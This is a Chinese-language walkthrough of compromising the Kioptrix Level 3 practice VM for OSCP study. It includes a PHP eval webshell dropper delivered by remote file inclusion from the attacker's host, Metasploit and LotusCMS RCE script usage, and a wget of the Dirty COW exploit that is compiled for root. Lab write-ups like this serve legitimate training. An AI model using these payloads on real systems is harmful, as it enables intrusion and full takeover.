自学内容网 自学内容网

渗透Kioptrix-Level 3靶机

本篇文章旨在为网络安全渗透测试行业靶机教学。通过阅读本文,读者将能够对渗透Kioptrix-Level 3靶机有一个初步的了解

一、信息收集阶段

1、扫描网段,发现主机

按照惯例对虚拟机DHCP网段进行nmap扫描

nmap -sP 192.168.0.0/24 

2、扫描主机详细信息

nmap -sT -sV -sC -O 192.168.0.185
# -sT 会尝试与目标主机的每个端口建立完整的 TCP 连接
# -sV 尝试确定每个打开端口上运行的服务的版本
# -sC 使用默认的脚本扫描(Script Scanning)可以帮助发现更多的信息,如漏洞、配置错误等


80端口,存在http服务。浏览器尝试访问

3、扫描http服务目录

dirb http://192.168.0.185
#扫描刚才访问的http

发现phpMyAdmin登录页面发现phpMyAdmin登录页面(用弱口令爆破失败,可能是我的字典不行)


发现登录页面2


(可以尝试是否存在文件包含漏洞?远程包含或者本地包含)

4、查看http服务的中间件跟开发语言版本

whatweb -v 192.168.0.185

二、攻击面寻找阶段

1、远程包含漏洞测试

通过信息收集阶段我们知道使用php语言,那么php伪造这个时候可以发挥用处,测试能不能远程文件包含www.baidu.com

http://192.168.0.185/index.php?system=http://www.baidu.com

2、网站框架信息收集

三、渗透攻击阶段

1、一句话木马尝试攻击(远程文件包含)

(1)在kali上写执行远程文件包含的一句话木马

<?php fputs(fopen('shell.php','w'),'<?php eval($ POST[pass])?>);?>


(2)把一句话木马放到攻击机kali的html目录


(3)然后在目标机web网站通过hackbar利用文件包含漏洞

http://192.168.0.185/index.php?system=http://192.168.0.17/1.php

2、通过网站框架历史漏洞尝试攻击

(1)知道CMS是lotusCMS,接下来通过searchsploit搜索公开的漏洞

searchsploit lotusCMS  


(2)通过https://www.exploit-db.com/下载利用文件exploit


(3)进入metasploit框架使用攻击模块

msfconsole
search lotuscms
use 0


(4)查看/设置payload设置

set rhosts 192.168.0.185#设置目标IP
set uri/index.php?system=Admin    #登录界面
set payload generic/shell_bind_tcp  #设置payload

四、提权阶段

1、渗透后靶机的信息收集

2、查找系统版本提权漏洞

searchsploit linux 2.6.2


(1)漏洞太多,看不过来 直接加过滤

searchsploit privilege|grep linux |grep 2.6.2
# privilege提权漏洞 过滤显示linux系统,过滤显示2.6.2版本

3、攻击机跟靶机下载exp文件

(1)因为OSCP考试严格限制使用metasploit,所以这个针对LotusCMS的exp最好通过github获取

git clone https://github.com/Hood3dRob1n/LotusCMS-Exploit


(2)执行利用文件脚本

./lotusRCE.sh 192.168.0.185 


(3)根据提示输入参数(本机IP跟监听端口)


(4)结合内核版本,这里使用的exp文件是40839.c(如果考试的时候不能确定使用哪个exp,尽可能的都尝试)

searchsploit 40839.c -m 


(5)移动利用文件到攻击机/var/www/html


(6)靶机下载exp

python -c 'import pty;pty.spawn("/bin/bash")'  ##python条用shell终端
wget http://192.168.0.17/40839.c


(7)切换到tmp目录下载

4、靶机编译exp提权

gcc -o 40839 40839.c


(1)编译失败分析(利用了gpt分析原因)

(2)重新编译

gcc -pthread 40839.c -o c -lcrypt
./c  #文件修改密码:123456
#相当于是篡改了firefart用户的密码,这个用户具有root权限,所以su firefart就相当于提权了





声明! 学习内容来自B站up主 泷羽sec的OSCP考证培训有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!


原文地址:https://blog.csdn.net/weixin_46926338/article/details/144364389

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!